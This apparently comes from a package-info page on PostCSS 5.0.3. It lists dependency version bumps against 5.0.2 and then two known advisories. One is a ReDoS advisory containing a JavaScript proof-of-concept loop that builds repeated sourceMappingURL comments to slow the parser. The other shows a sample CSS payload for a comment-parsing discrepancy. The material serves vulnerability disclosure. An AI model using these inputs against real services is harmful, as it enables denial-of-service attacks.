PostCSS version 5.0.3 represents a minor update to the popular CSS transformation tool, building upon the foundation established by version 5.0.2. Both versions retain the core functionality of enabling developers to manipulate CSS with JavaScript plugins, offering a powerful and flexible approach to styling web projects. They share the same core dependencies, ensuring consistent performance in areas like Base64 encoding (js-base64), source map generation (source-map), and color support detection (supports-color).
However, several key differences in the development dependencies highlight the improvements and refinements made in version 5.0.3. The eslint dependency was updated from version 1.2.1 to 1.3.0, indicating potential enhancements in code linting and style adherence. The babel-core dependency was updated from 5.8.22 to 5.8.23, suggesting minor improvements or bug fixes in the underlying Babel transpilation process, while babel-eslint received an update from 4.0.10 to 4.1.0, ensuring better compatibility. The update on dependency fs-extra from version 0.23.1 to 0.24.0 probably means improvements to the file manipulation features. The postcss-parser-tests dependency saw an increment from 5.0.0 to 5.0.1 - probably related to the bugfixing and internal functionalities.
These updates, while seemingly small, collectively contribute to a more robust and reliable development environment for PostCSS users. Developers can expect incremental improvements in code quality, transpilation accuracy, and overall stability when upgrading to version 5.0.3. The changes reflect a commitment to continuous improvement and responsiveness to the evolving needs of the web development community, making PostCSS a continuously improving choice for CSS transformations.
All the vulnerabilities related to the version 5.0.3 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.